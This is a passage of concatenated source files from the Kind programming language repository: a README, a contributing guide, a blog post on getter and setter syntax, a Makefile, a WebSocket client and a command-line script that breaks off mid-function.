} deriving (stringifier, parser, serializer, deserializer)
Test: _
IO {
let val = MyType.foo([1,2,3], "Hello", MyType.bar)
// Converts to string
let str = Stringifier.run!(MyType.stringifier, val)
IO.print("str: " | str)
// Parses string to a value
let val = Parser.run!(MyType.parser, str) <> MyType.bar
// Serializes to bits
let bts = Serializer.run!(MyType.serializer, val)
IO.print("bts: " | Bits.show(bts))
// Deserializes to a value
let val = Deserializer.run!(MyType.deserializer, bts) <> MyType.bar
// Converts to string again
let str = Stringifier.run!(MyType.stringifier, val)
IO.print("str: " | str)
}
```
### Kind 1.0.51
- Inference on numeric literals and binary operators. Check `SYNTAX.md`.
- Many bugfixes
### Kind 1.0.46
- New syntax to create, get and set attributes of records
```
type Foo {
new(x: Nat, y: Nat)
}
Test: _
let foo = {1,2} // same as `Foo.new(1,2)`
let x = foo@x // same as `case foo { new: foo.x }`
let bar = foo@y <- 80 // same as `case foo { new: Foo.new(80,foo.y) }`
bar
```
<file_sep>/bin/scm/Makefile
# choose whether to use kind or kind-scm for bootstrapping
KIND := kind-scm
PREFIX := /usr/local/bin/
CHEZ-EXE := compile-chez-program
all: bin/kind-scm
deb: kind-scm.deb
# compiles kind files to scheme
# do this after modifying the compiler source-code
bootstrap:
cd ../../base && $(KIND) Kind.Comp.Target.Scheme.bootstrap --run
clean:
rm src/*.wpo
rm src/*.so
rm src/*.chez
rm src/*.generated.c
rm bin/*
bin/kind-scm:
$(CHEZ-EXE) --full-chez --libdirs src --optimize-level 2 src/main.scm
mv src/main bin/kind-scm
chmod +x bin/kind-scm
kind-scm.deb: bin/kind-scm
mkdir -p kind-scm_1.0.1-0_amd64/usr/local/bin/
cp bin/kind-scm kind-scm_1.0.1-0_amd64/usr/local/bin/
dpkg-deb --root-owner-group --build kind-scm_1.0.1-0_amd64/ bin/kind-scm_1.0.1-0_amd64.deb
install: bin/kind-scm
chmod +x bin/kind-scm
cp bin/kind-scm $(PREFIX)
test:
echo $(PREFIX)
<file_sep>/README.md
# Kind
A minimal, efficient and practical programming language that aims to rethink functional programming from the scratch, and make it right. Under the hoods, it is basically Haskell, except without historical mistakes, and with a modern, consistent design. On the surface, it aims to be more practical, and to look more like conventional languages. Kind is statically typed, and its types are so powerful that you can prove mathematical theorems on it. Compared to proof assistants, Kind has:
1. The smallest core. Check [FormCore.js](https://github.com/moonad/FormCoreJS/blob/master/FormCore.js) or [Core.kind](https://github.com/uwu-tech/Kind/blob/master/base/Kind/Core.kind). Both are `< 1000-LOC` complete implementations!
2. Novel type-level features. Check [this article](https://github.com/uwu-tech/Kind/blob/master/blog/1-beyond-inductive-datatypes.md) on super-inductive datatypes.
3. An accessible syntax that makes it less scary. Check [SYNTAX.md](https://github.com/uwu-tech/Kind/blob/master/SYNTAX.md).
4. A complete bootstrap: the language is implemented in itself. Check it [here](https://github.com/uwu-tech/Kind/tree/master/base/Kind).
5. Efficient real-world compilers. Check [http://uwu.tech/](http://uwu.tech) for a list of apps. (WIP)
Usage
-----
 [](https://t.me/formality_lang)
0. Choose a release. We'll use JavaScript here but ChezScheme is also [available](/INSTALL.md).
1. Install Kind using `npm`:
```bash
npm i -g kind-lang
```
2. Save the file below as `Main.kind`:
```javascript
Main: IO(Unit)
IO {
IO.print("Hello, world!")
}
```
3. Type-check it:
```bash
kind Main
```
4. Run it:
```bash
kind Main --run
```
5. Have fun!
Things you can do with Kind:
----------------------------
### Compile programs and modules to several targets.
Kind has an universal compiler that targets several back-ends. Just find what you need on Kind, and compile it with `kind Main --lang`. For example, to generate a QuickSort function in JavaScript, just type `kind List.quicksort --js`. You may never write code in any other language! Available targets: `--js`, `--scm`. Several more will be available eventually.
### Create live applications.
Kind has an interconnected back-end that allows you to create rich, interactive applications without ever touching databases, TCP packets or messing with apis. Just add a file to `base/App` and it will be available on [http://uwu.tech/](http://uwu.tech). You can fork entire applications - not just the front-end, but all of it, back-end, database, and networking - in seconds.
### Prove theorems.
No, theorems are not scary things mathematicians do. For programmers, they're more like unit tests, except they can involve symbols, allowing you to cover infinitely many test cases. If you like unit tests, you'll love theorems. To learn more, check [THEOREMS.md](THEOREMS.md). You can also compile Kind programs and proofs to a minuscle core language with the `--fmc` flag (example: `kind Nat.add.assoc --fmc`). Try it!
### Deploy Smart-Contracts.
(Soon.)
Examples
--------
### Some programs
```javascript
// A 'Hello, world!"
Main: IO(Unit)
IO {
IO.print("Hello, world!")
}
```
```javascript
// Quicksort (using recursion)
quicksort(list: List<Nat>): List<Nat>
case list {
nil:
[]
cons:
fst = list.head
min = filter!((x) x <? list.head, list.tail)
max = filter!((x) x >=? list.head, list.tail)
quicksort(min) ++ [fst] ++ quicksort(max)
}
```
```javascript
// List iteration (using folds)
some_text: String
List.foldl!!("",
(str, result)
str = String.to_upper(str)
str = String.reverse(str)
result | str,
["cba","fed","ihg"])
```
```javascript
// List iteration (using fors)
some_text: String
result = ""
for str in ["cba","fed","ihg"] with result:
str = String.to_upper(str)
str = String.reverse(str)
result | str
result
```
```c
// Map, Maybe, String and Nat sugars
sugars: Nat
key = "toe"
map = {"tic": 1, "tac": 2, key: 3} // Map.from_list!([{"tic",1}, ...])
map = map{"tic"} <- 100 // Map.set!("tic", 100, map)
map = map{"tac"} <- 200 // Map.set!("tac", 200, map)
map = map{ key } <- 300 // Map.set!(key, 300, map)
val0 = map{"tic"} <> 0 // Maybe.default!(Map.get!("tic",map), 0)
val1 = map{"tac"} <> 0 // Maybe.default!(Map.get!("tac",map), 0)
val2 = map{ key } <> 0 // Maybe.default!(Map.get!(key, map), 0)
val0 + val1 + val2 // Nat.add(val0, Nat.add(val1, val2))
```
```c
// List monadic block: returns [{1,4},{1,5},{1,6},{2,4},...,{3,6}]
my_list: List<Pair<Nat,Nat>>
List {
get x = [1, 2, 3]
get y = [4, 5, 6]
return {x, y}
}
```
Check many List algorithms on [base/List](https://github.com/uwu-tech/Kind/tree/master/base/List)!
### Some types
```javascript
// A boolean
type Bool {
true
false
}
```
```javascript
// A natural number
type Nat {
zero
succ(pred: Nat)
}
```
```javascript
// A polymorphic list
type List <A: Type> {
nil
cons(head: A, tail: List<A>)
}
```
```javascript
// A polymorphic pair
type Pair <A: Type, B: Type> {
new(fst: A, snd: B)
}
```
```javascript
// A polymorphic dependent pair
type Sigma <A: Type, B: A -> Type> {
new(fst: A, snd: B(fst))
}
```
```javascript
// A polymorphic list with a statically known size
type Vector <A: Type> ~ (size: Nat) {
nil ~ (size = 0)
cons(size: Nat, head: Nat, tail: Vector<A,size>) ~ (size = 1 + size)
}
```
```javascript
// A bounded natural number
type Fin ~ <lim: Nat> {
zero<N: Nat> ~ (lim = Nat.succ(N))
succ<N: Nat>(pred: Fin<N>) ~ (lim = Nat.succ(N))
}
```
```javascript
// The type used in equality proofs
type Equal <A: Type, a: A> ~ (b: A) {
refl ~ (b = a)
}
```
```javascript
// A burrito
type Monad <M: Type -> Type> {
new(
bind: <A: Type, B: Type> M<A> -> (A -> M<B>) -> M<B>
pure: <A: Type> A -> M<A>
)
}
```
```javascript
// Some game entity
type Entity {
player(
name: String
pos: V3
health: Nat
items: List<Item>
sprite: Image
)
wall(
hitbox: Pair<V3, V3>
collision: Entity -> Entity
sprite: Image
)
}
```
Check all core types on [base](https://github.com/uwu-tech/Kind/tree/master/base)!
### Some proofs
```javascript
// Proof that `a == a + 0`
Nat.add.zero(a: Nat): a == Nat.add(a, 0)
case a {
zero: refl
succ: apply(Nat.succ, Nat.add.zero(a.pred))
}!
```
```javascript
// Proof that `1 + (a + b) == a + (1 + b)`
Nat.add.succ(a: Nat, b: Nat): Nat.succ(a + b) == (a + Nat.succ(b))
case a {
zero: refl
succ: apply(Nat.succ, Nat.add.succ(a.pred, b))
}!
```
```javascript
// Proof that addition is commutative
Nat.add.comm(a: Nat, b: Nat): (a + b) == (b + a)
case a {
zero:
Nat.add.zero(b)
succ:
p0 = Nat.add.succ(b, a.pred)
p1 = Nat.add.comm(b, a.pred)
p0 :: rewrite X in Nat.succ(X) == _ with p1
}!
```
Check some Nat proofs on [base/Nat/add](https://github.com/uwu-tech/Kind/tree/master/base/Nat/add)!
### A web app
```javascript
// Render function
App.Hello.draw: App.Draw<App.Hello.State>
(state)
<div style={"border": "1px solid black"}>
<div style={"font-weight": "bold"}>"Hello, world!"</div>
<div>"Clicks: " | Nat.show(state@local)</div>
<div>"Visits: " | Nat.show(state@global)</div>
</div>
// Event handler
App.Hello.when: App.When<App.Hello.State>
(event, state)
case event {
init: IO {
App.watch!(App.room_zero)
App.new_post!(App.room_zero, App.empty_post)
}
mouse_down: IO {
App.set_local!(state@local + 1)
}
} default App.pass!
```
Source: [base/App/Hello.kind](https://github.com/uwu-tech/Kind/blob/master/base/App/Hello.kind)
Live: [http://uwu.tech/App.Hello](http://uwu.tech/App.Hello)
In order to run this or any other app you should follow this steps:
- The app should be in `base/App` folder
- Install necessary packages in web folder with `npm i --prefix web/`
- Install `js-beautify` using `sudo npm i -g js-beautify`
- Run our local server with `node web/server`
- Build the app you want with `node web/build App.[name of app]` (in this example would be `node web/build App.Hello`)
- Open `localhost` in your favorite browser and see your app working
Future work
-----------
There are so many things we want to do and improve. Would like to contribute? Check [CONTRIBUTE.md](https://github.com/uwu-tech/Kind/blob/master/CONTRIBUTE.md). Also reach us on [Telegram](https://t.me/formality_lang). We're friendly!
<file_sep>/.github/ISSUE_TEMPLATE/support.md
---
name: ❓ Support
about: Get help using the language
---
To help future users with similar problems please
[ask a question](https://stackoverflow.com/questions/tagged/kind-lang) in stack
overflow under the tag `kind-lang`. We are monitoring the tag
and will help you there.
<file_sep>/CONTRIBUTE.md
# Contributing
Want to contribute? Here are some things we need. If
you want to work in any of these, [contact us](http://t.me/formality_lang) for
instructions!
## Funding
We're self-funded. More funds = more devs = more cool features.
If you'd like to help with donations, grants or funding, obviously let us know (:
## Improve base
The best way to start contributing (and to get familiar with the codebase) is to
just add files to `base`. Kind's
[base](https://github.com/uwu-tech/Kind/tree/master/base) is in a constant state
of evolution. It has several functions that aren't well documented. Some
functions may have inconsistent names here and there. Some obvious functions may
be missing. Many data structures are missing. Find anything you can improve,
work on it and submit a PR. We'll be very happy to review it!
As an example, all the proofs on
[Nat/Add](https://github.com/uwu-tech/Kind/tree/master/base/Nat/add) were added
by Eloi (thanks!). That kind of contribution is always welcome!
## Improve the Numeric libraries
There are many missing numeric types on `Kind/base`, such as `I128`. The
existing types, such as `U32`, may also have missing functions here and there.
Additions are welcome!
## Implement missing Word algorithms
While Kind optimizes operations such as `I32.add` to native operations in its
back-ends, these operations still need to be implemented in pure Kind, for
theorem proving purposes. Since implementing these operations for every numeric
type would be repetitive, most of these are implemented on the `Word` type,
which represent N-bit values (for example, `I32` is a thin wrapper around
`Word<32>`, so `I32.add` just calls `Word.add<32>`). While many operations are
implemented, many are still missing. For example, all these operations are
TODOs:
```
Word.int.add
Word.int.mul
Word.int.sub
Word.int.mod
Word.int.div
Word.int.pow
Word.int.eql
Word.int.ltn
Word.int.lte
Word.int.eql
Word.int.gte
Word.int.gtn
Word.float.add
Word.float.mul
Word.float.sub
Word.float.mod
Word.float.div
Word.float.pow
Word.float.eql
Word.float.ltn
Word.float.lte
Word.float.eql
Word.float.gte
Word.float.gtn
```
Adding these would be great.
## Add another back-end
Are you a full-time JavaScript developer that doesn't like JavScript? You can
just use Kind as your main language, compile it to JS with `kind Your.Term --js`
and import it with `require("Your.Term")`. Imagine being able to do that for
every language? Currently, Kind targets Scheme and JavaScript. We'd like more
backends, as many as possible. Adding a new back-end is somewhat simple: just
add its syntax on
[base/Kind/Comp/Target](https://github.com/uwu-tech/Kind/tree/master/base/Kind/Comp/Target)!
## Add a rich geometry library
We have some very primtive 3D vector operations, but not much else. For game
development purposes, it would be amazing to have a rich library of geometric
primitives, including matrices, quaternions, collisions, space partitioning
structures and so on. Adding these is always welcome!
## Add a WebGL renderer
Right now, the [DOM](https://github.com/uwu-tech/Kind/blob/master/base/DOM.kind)
type allows rendering text, HTML nodes and pixelated canvas. It would be amazing
to have a render mode that integrated with WebGL. If you'd like to work on that,
contact us for more instructions!
## Create apps
Sounds silly, but just creating apps using the `App` type would be amazing. Any
app added to `base/App` will show up on [http://uwu.tech/](http://uwu.tech).
Sadly, we don't have a tutorial on how apps work, but it should be learnable
from looking the examples.
## Get rid of FormCoreJS
Right now, the JavaScript compiler on
[JavaScript.kind](https://github.com/uwu-tech/Kind/tree/master/base/Kind/Comp/Target)
is lackluster, compared to the one in
[FmcToJs.js](https://github.com/moonad/FormCoreJS/blob/master/FmcToJs.js). That
is why, when compiling to JS, instead of using the compiler written in Kind, we
compile to `FormCore`, and then use `FmcToJs.js`. Because of that, the Scheme
back-end will produce much worse JS code than the Node.js back-end, among other
issues. It would be nice to improve `JavaScript.kind` to make it as efficient as
`FmcToJs.js`, allowing us to get rid of the JavaScript dependency.
## Improve the pair syntax
There are many missing syntaxes. For example, we don't have a syntax for
quadruples, triples, only pairs. We also can't destruct triples, quadruples. We
also can't destruct pairs in function arguments, in loops. For example:
```
let {x,y,z} = my_vector
List.map(({x,y}) x + y, list)
let sum = for {x,y} in positions: x + y + sum
```
None of the syntaxes above is available yet. Deep and nested pairs aren't
available either. There are many syntaxes that aren't available or could be
improved. Working on that with us is always welcome (but please, ask before!)
## Improve the usage of the get/set syntaxes
The get/set syntaxes can't be chained. For example,
```
let list = list[2] <- 100
```
sets the element of index 2 on `list` to `100`. But
```
let list = list[2][2] <- 100
```
doesn't work as expected. It must be written as:
```
let list = list[2] <- (list[2][2] <- 100)
```
The same is the case for maps (`map{"x"} <- 2`) and records (`record@x <- 2`).
Adding these syntaxes would be nice.
Moreover, the following syntax would be nice to have:
```
let list[2] <- 100
```
This would be equivalent to:
```
let list = list[2] <- 100
```
## Improve the usability of map keys
Right now, when using maps, you need to explicitly convert your keys to strings.
For example:
```
map{U256.show(1234)} <- "entry"
```
It would be nice if we either improved maps to have polymorphic keys, or
improved the parser to automatically add these conversions, in the same way that
operators (like `+`) are polymoprhic.
## Remove the need for parenthesis on forall's syntax
The "forall" syntax requires a parenthesis sometimes. For example:
```
foo: Type
((A: Type) -> A)
```
This shouldn't be the case and needs investigation.
## Add more generics
Right now, we can derive `serializer, deserializer, stringifier, parser` for types.
For example:
```
type MyType {
foo
bar
} deriving (stringifier, parser)
```
Derives `MyType.stringifier`, `MyType.parser`. It would be nice to also allow
deriving other functions such as `show, read, equal, larget_than, greater_than,
serialize, deserialize`. Most of these are trivial. For example, `show` is just
a wrapper that could use `stringifier`, and `serialize` is just a wrapped that
could use `serializer`. Regardless, these are TODOs. Adding these would be
great.
## Add implicits
One of the main sources of verbosity in Kind is the lack of implicit arguments.
That is partly improved by holes and `!`. For example, `Pair.new` can be written
as `Pair.new<Nat,Nat>(1,2)`, or `Pair.new<_,_>(1,2)`, or `Pair.new!!(1,2)`. It
would be better to write just `Pair.new(1,2)`. It is not clear how to add implicit
arguments to Kind without making some undesirable compromises, but it would be
a great improvement.
## Re-add optimal evaluators
Past versions of Kind/Formality had an option to compile programs to optimal
λ-calculus evaluators, which allowed us to explore these, using the language
syntax. Sadly, this isn't available anymore. Re-adding would be amazing. In
order to do that, the shortest path would be to port the code in [this
repository](https://github.com/MaiaVictor/abstract-algorithm) to Kind.
## Implement an EVM compiler
Implement a compiler from the low-order, linear λ-calculus to the EVM. Doing so
is completely viable and will result in efficient smart-contracts. Once we have
this, plus linear types, Kind will be able to be used as a smart-contract
language. Contact us for more instructions.
## Add linear types
Adding linear types would allow us to separate the linear from the non-linear
subset of the language. That would bring several benefits.
1. **Mutable structures.** Right now, `base/Buffer8` is considered unsafe,
because it is optimized to use mutable buffers under the hoods, on the JS
back-end. That means that, if you use it non-linearly, your program may
behave incorrectly. With linear types, we could apply the optimization only
when `Buffer8` is linear. Similarly, we could optimize arrays and maps to use
mutable datatypes when suitable.
2. **EVM compilation.** While we have managed to reduce the cost of
[beta-reduction](https://medium.com/@maiavictor/compiling-formality-to-the-evm-99aec75677dd)
to miraculous 200 gas, even that is still too much for the very expensive
environment of the Ethereum blockchain. Because of that, our best bet to
compile to EVM, right now, is to compile the linear, low-order subset of
Kind. That sounds lackluster, but it is actually pretty sufficient. That
means we'd be able to write smart-contracts using Kind's syntax. As long as
you don't do certain things (like using `List.map` or duplicating arguments),
it will work fine, it will be inexpensive, and it will compile to efficient
Ethereum contracts. But, for that, we need linearity.
2. **Compile to optimal λ-calculus evaluators.** We have done a lot of
experimentation with [optimal
λ-evaluators](https://medium.com/@maiavictor/solving-the-mystery-behind-abstract-algorithms-magical-optimizations-144225164b07)
in the past, but isn't currently available. Adding linear types would allow
us to compile it soundly to optimal evaluators in a sound manner.
3. **Consistency/Termination checkers.** Adding linear types will make the job
of making a consistency checker easier. Check the section below.
Adding linearity checker to the compiler isn't a PhD-level task, but it requires
some experience with functional programming, a lot of patience and knowledge
about our type checker. Contact us if you are interested!
## Add a consistency checker
Compared to other proof languages, kind takes an inverted approach. Instead of
consistency being default and expressivity being opt-in (like Agda's
`type-in-type` pragma), here, expressivity is default and consistency is a
planned opt-in. That means you're allowed to write programs with no
restrictions, just like most traditional languages like Haskell or JavaScript,
as long as they're total and well-typed. But that also means programs that do
not halt, and logical paradoxes, aren't prohibited.
Regardless, there are several terminating, consistent subsets of Kind, each
admiting different kinds of programs. For example, with structural recursion,
we're allowed to have Agda-like proofs, but no `Type:Type`. Under elementary
affine logic, we're allowed to have `Type:Type`, but not certain forms of nested
loops. Adding checkers for different consistent subsets would be a nice feature.
For the end user, this could be presented as an icon when type-checking. For
example:
```
$ kind Nat.add
Nat.add: (n:Nat) (m:Nat) Nat ✓ ⊤
All terms check.
```
With `✓` standing for "well-typed" and `⊤` standing for "terminating".
## Research how to add HoTT features
While we have some interesting insights on the matter (check [this blog
post](https://github.com/uwu-tech/Kind/blob/master/blog/1-beyond-inductive-datatypes.md)),
Kind isn't capable of expressing the most important HoTT features. We could add
these inspired on Cubical Type Theory, but this would increase the size of
Kind's core by a few multipliers, which we don't want to. In special, the
`transp` function seems to account for most of that complexity. Investigating
how to add HoTT features without blowing up the core size is an interesting line
of research.
## Extend CONTRIBUTE.md
I'm currently adding items as I remember, so this list isn't complete right now.
If you have any improvement in mind, feel free to add here too!
<file_sep>/base/check.sh
kind Bits/
kind Nat/add/
kind Nat/div_mod/
<file_sep>/blog/3-getters-and-setters.md
Getters and Setters in Kind
===========================
The verbosity of nested fields
------------------------------
One of the most annoying aspects of pure functional programming is getting,
setting and mutating deeply nested fields. In impure languages like JavaScript,
this was never a problem. For example, consider the following object:
```javascript
let obj = {
name: "sample"
data: {
"a": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0]
"b": [7.0, 7.0, 7.0, 7.0, 7.0, 7.0]
}
}
```
Altering a nested field is easy:
```javascript
obj.data["a"][0] = 42.0
```
In Haskell, the equivalent code is very verbose. Lenses greatly improve the
situation, but they 1. have considerable runtime cost, 2. require big external
libraries, 3. can be overkill, 4. are still not as succinct as JS.
To be fair, the JavaScript version, while terse, is problematic. Not only
because it mutates the original object, but because, if any of the keys don't
exist, the program will crash. To make that program safe, one must make
several checks that end up making the code verbose too:
```javascript
var data = obj.data
if ( obj.data !== undefined
&& obj.data["a"] !== undefined
&& obj.data["a"][0] !== undefined) {
obj.data["a"][0] = 42.0
}
```
In [Kind](https://github.com/kind-lang/kind), the earlier versions of the
language suffered from a similar problem. The equivalent object could be
defined as:
```javascript
type Object {
new(
name: String
data: Map<List<F64>>
)
}
obj: Object
Object.new("sample", {
"a": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0]
"b": [7.0, 7.0, 7.0, 7.0, 7.0, 7.0]
})
```
And, like on most pure languages, altering nested fields was verbose:
```javascript
obj2: Object
case obj {
new: case Map.get!("a", obj.data) as got_list {
none: obj
some: case List.get!(0, got_list.value) as got_number {
none: obj
some: Object.new(obj.name, Map.set!("a", List.set!(0, 42.0, got_list.value), obj.data))
}
}
}
```
Kind-Lang's obvious solution
----------------------------
Since the last version, Kind features a built-in getter and setter syntax that
makes these operations succinct:
```javascript
new_obj: Object
obj@data{"a"}[0] <- 42.0
```
This small one-liner is equivalent to the huge case tree we had to write before.
It immutably alters the first number of `obj` to `42`. The way it works is
`x@field` focuses a field, `x{key}` focuses a Map entry, and `x[index]` focuses
a List element. These focusers can be chained to get deep fields:
```javascript
data: Map<List<F64>>
obj@data
nums: Maybe<List<F64>>
obj@data{"a"}
number: Maybe<F64>
obj@data{"a"}[0]
```
And, to set, just append a `<- new_val`. This will overwrite the focused field,
immutably. You can also use `<~` to apply a function instead:
```javascript
new_obj: Object
obj@data{"a"}[0] <~ F64.mul(2.0)
```
Note that, as expected, `Maybe` shows up only when needed, such as when getting
an element from a list or map. Finally, you can "mutate" an object in a JS-like
fashion by using a `let` expression together with an immutable setter:
```
let obj = obj@data{"a"}[0] <~ F64.mul(2.0)
```
This "mutation" is actually pure: the original `obj` wasn't changed, you just
made a new object with the same name. You can still access the old one by
writing `obj^`. This, in effect, does the same as a JS assignment operator:
```
obj.data["a"][0] *= 2.0
```
Except without mutability, without annoying checks, without runtime errors, with
strong types, and with the flexibility to use any function, instead of just `*`,
`+`, etc. To make it even more terse, the line above can be abbreviated as:
```
let obj@data{"a"}[0] <~ F64.mul(2.0)
```
And that's all! This desugars to an efficient, linear
[Form-Core](https://github.com/moonad/FormCoreJS) program that doesn't use heavy
lenses, and avoids re-getting nested fields.
Conclusion
----------
In short, dealing with nested fields in JavaScript looks nice but is terrible;
in Haskell, it looks terrible and is; in Kind, it is a joyful experience that
makes you proud of your career choice.
I'm making this post because this is such a huge, needed quality-of-life
improvement that I believe every pure language should come with something
similar out-of-the-box, and I don't understand why they make it so hard. You
shouldn't need huge third party libs to do something that fundamental.
Finally, note this is *not* a built-in lens implementation. Lenses are
first-class objects. Instead, it is just a baseline syntax for immutably
setting, getting and modifying nested values in records, lists and maps. And
that completely changes how the language feels.
<file_sep>/web/events/client.js
var lib = require("./lib.js");
var ethsig = require("nano-ethereum-signer");
var WebSocket = require("isomorphic-ws");
module.exports = function client({url = "ws://localhost:7171", key = "0000000000000000000000000000000000000000000000000000000000000001"} = {}) {
var ws = new WebSocket(url);
var Posts = {};
var watching = {};
// Waits ws to be ready and then sends buffer to server
function ws_send(buffer) {
if (ws.readyState === 1) {
ws.send(buffer);
} else {
setTimeout(() => ws_send(buffer), 20);
}
}
// Time sync variables
var last_ask_time = null; // last time we pinged the server
var last_ask_numb = 0; // id of the last ask request
var best_ask_ping = Infinity; // best ping we got
var delta_time = 0; // estimated time on best ping
var ping = 0; // current ping
// User-defined callbacks
var on_init_callback = null;
var on_post_callback = null;
// Sets the on_init callback
function on_init(callback) {
on_init_callback = callback;
}
// Sets the on_post callback
function on_post(callback) {
on_post_callback = callback;
}
// Sends a signed post to a room on the server
function send_post(post_room, post_data, priv_key = key) {
var priv_key = lib.check_hex(256, priv_key);
var post_room = lib.check_hex(64, post_room);
var post_data = lib.check_hex(null, post_data);
var post_hash = ethsig.keccak("0x"+lib.hexs_to_bytes([post_room, post_data])).slice(2);
var post_sign = ethsig.signMessage("0x"+post_hash, "0x"+priv_key).slice(2);
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.POST),
post_room,
post_data,
post_sign,
]);
ws_send(msge_buff);
};
// Starts watching a room
function watch_room(room_name) {
var room_name = room_name.toLowerCase();
if (!watching[room_name]) {
watching[room_name] = true;
var room_name = lib.check_hex(64, room_name);
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.WATCH),
room_name,
]);
Posts[room_name] = [];
ws_send(msge_buff);
}
};
// Stops watching a room
function unwatch_room(room_name) {
var room_name = room_name.toLowerCase();
if (watching[room_name]) {
watching[room_name] = false;
var room_name = lib.check_hex(64, room_name);
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.UNWATCH),
room_name,
]);
ws_send(msge_buff);
}
};
// Returns the best estimative of the server's current time
function get_time() {
return Date.now() + delta_time;
};
// Returns the best estimative of the server's current tick
function get_tick() {
return Math.floor((Date.now() + delta_time) / 62.5);
};
// Asks the server for its current time
function ask_time() {
last_ask_time = Date.now();
last_ask_numb = ++last_ask_numb;
ws_send(lib.hexs_to_bytes([
lib.u8_to_hex(lib.TIME),
lib.u64_to_hex(last_ask_numb),
]));
};
ws.binaryType = "arraybuffer";
ws.onopen = function() {
if (on_init_callback) {
on_init_callback();
}
// Pings time now, after 0.5s, after 1s, and then every 2s
setTimeout(ask_time, 0);
setTimeout(ask_time, 500);
setTimeout(ask_time, 1000);
setInterval(ask_time, 2000);
};
ws.onmessage = (msge) => {
var msge = new Uint8Array(msge.data);
//console.log("receiving", msge);
if (msge[0] === lib.SHOW) {
var room = lib.bytes_to_hex(msge.slice(1, 9));
var tick = lib.bytes_to_hex(msge.slice(9, 17));
var addr = lib.bytes_to_hex(msge.slice(17, 37));
var data = lib.bytes_to_hex(msge.slice(37, msge.length));
//console.log("- room", room)
//console.log("- addr", addr)
//console.log("- data", data)
Posts[room].push({tick, addr, data});
if (on_post_callback) {
on_post_callback({room, tick, addr, data}, Posts);
}
};
if (msge[0] === lib.TIME) {
var reported_server_time = lib.hex_to_u64(lib.bytes_to_hex(msge.slice(1, 9)));
var reply_numb = lib.hex_to_u64(lib.bytes_to_hex(msge.slice(9, 17)));
if (last_ask_time !== null && last_ask_numb === reply_numb) {
ping = (Date.now() - last_ask_time) / 2;
var local_time = Date.now();
var estimated_server_time = reported_server_time + ping;
if (ping < best_ask_ping) {
delta_time = estimated_server_time - local_time;
best_ask_ping = ping;
}
}
};
};
return {
on_init,
on_post,
send_post,
watch_room,
unwatch_room,
get_time,
get_tick,
lib,
};
};
<file_sep>/.github/ISSUE_TEMPLATE/open_discussion.md
---
name: 💬 General discussion
about: Discuss anything that doesn't fit in the other categories
---
We sure want to hear what you have to say. Please tell us in our
`Discussions` tab. Currently issues deal exclusively with bugs or
feature requests.
<file_sep>/bin/js/src/main.js
#!/usr/bin/env -S node --stack-size=10000
var kind = require("./kind.js");
var fs = require("fs");
var fsp = require("fs").promises;
var path = require("path");
var exec = require("child_process").execSync;
var {fmc_to_js, fmc_to_hs} = require("formcore-js");
//var {fmc_to_js, fmc_to_hs} = require("./../../../../FormCoreJS");
// Locates the Kind/base dir and moves to it, or quits if it can't be found
var ADD_PATH = "";
function find_base_dir() {
var full_path = process.cwd();
var local_dir = fs.readdirSync(".");
var kind_indx = full_path.toLowerCase().indexOf("/kind/base");
if (kind_indx !== -1) {
if (kind_indx + 10 !== full_path.length) {
ADD_PATH = full_path.slice(kind_indx + 10).slice(1)+"/";
}
process.chdir(full_path.slice(0, kind_indx + 10));
//} else if (local_dir.indexOf("kind") !== -1) {
//process.chdir(path.join(full_path, "kind"));
//find_base_dir();
//} else if (local_dir.indexOf("Kind") !== -1) {
//process.chdir(path.join(full_path, "Kind"));
//find_base_dir();
} else if (local_dir.indexOf("base") !== -1 && full_path.slice(-5).toLowerCase() === "/kind") {
process.chdir(path.join(full_path, "base"));
find_base_dir();
//} else {
//console.log("# Kind "+require("./../package.json").version);
//console.log("Couldn't find Kind/base directory.\n");
//console.log("Go to the directory to run Kind commands or clone the repository:");
//console.log(" git clone https://github.com/uwu-tech/Kind");
//console.log("New files must be added inside Kind/base directory.");
//process.exit();
}
};
find_base_dir();
// Finds all .kind files inside a directory, recursivelly
async function find_kind_files(dir) {
try {
var files = await fsp.readdir(dir);
var found = [];
for (let file of files) {
var name = path.join(dir, file);
var stat = await fsp.stat(name);
if (stat.isDirectory()) {
var child_found = await find_kind_files(name);
for (let child_name of child_found) {
found.push(child_name);
}
} else if (name.slice(-5) === ".kind") {
found.push(name);
}
}
} catch (e) {
console.log("Not a directory: " + dir);
process.exit();
}
return found;
}
// Converts a JS Array to a Kind list
function array_to_list(arr) {
var list = {_: "List.nil"};
for (var i = arr.length - 1; i >= 0; --i) {
list = {_: "List.cons", head: arr[i], tail: list};
}
return list;
}
if (!process.argv[2] || process.argv[2] === "--help" || process.argv[2] === "-h") {
console.log("# Kind "+require("./../package.json").version);
console.log("");
console.log("Usage:");
console.log("");
console.log(" kind Module/ # type-checks a module");
console.log(" kind Module/file.kind # type-checks a file");
console.log(" kind full_term_name --run # runs a term using JavaScript");
console.log(" kind full_term_name --run-scm # runs a term using Chez Scheme");
console.log(" kind full_term_name --show # prints a term");
console.log(" kind full_term_name --norm # prints a term's λ-normal form");
console.log(" kind full_term_name --js # compiles a term to JavaScript");
console.log(" kind full_term_name --scm # compiles a term to Chez Scheme");
console.log(" kind full_term_name --fmc # compiles a term to FormCore");
console.log("");
console.log("Examples:");
console.log("");
console.log(" # Run the 'Main' term (outputs 'Hello, world'):");
console.log(" kind Main --run");
console.log("");
console.log(" # Type-check all files inside the 'Nat' module:");
console.log(" kind Nat/");
console.log("");
console.log(" # Type-check the 'Nat/add.kind' file:");
console.log(" kind Nat/add.kind");
console.log("");
console.log(" # Type-check the 'Nat.add' term:");
console.log(" kind Nat.add");
console.log("");
console.log(" # Compile the 'Nat.add' term to JavaScript:");
console.log(" kind Nat.add --js");
console.log("");
console.log(" # Print the λ-encoding of Nat:");
console.log(" kind Nat --show");
console.log("");
console.log(" # Print the λ-normal form of 2 + 2:");
console.log(" kind Example.two_plus_two --norm");
process.exit();
}
function is_file(name){
return name.slice(-5) === ".kind"
}
function display_error(name, error){
if(is_file(name)){
console.log("Cannot compile a file (<main>.kind). Choose a term and try again.");
} else {
console.log("Compilation error.");
console.log(error);
}
}
(async () => {
var name = process.argv[2];
// FormCore compilation
if (process.argv[3] === "--fmc") {
console.log(await kind.run(kind["Kind.api.io.term_to_core"](name)));
// JavaScript compilation
} else if (process.argv[3] === "--js") {
var module = process.argv[4] === "--module";
try {
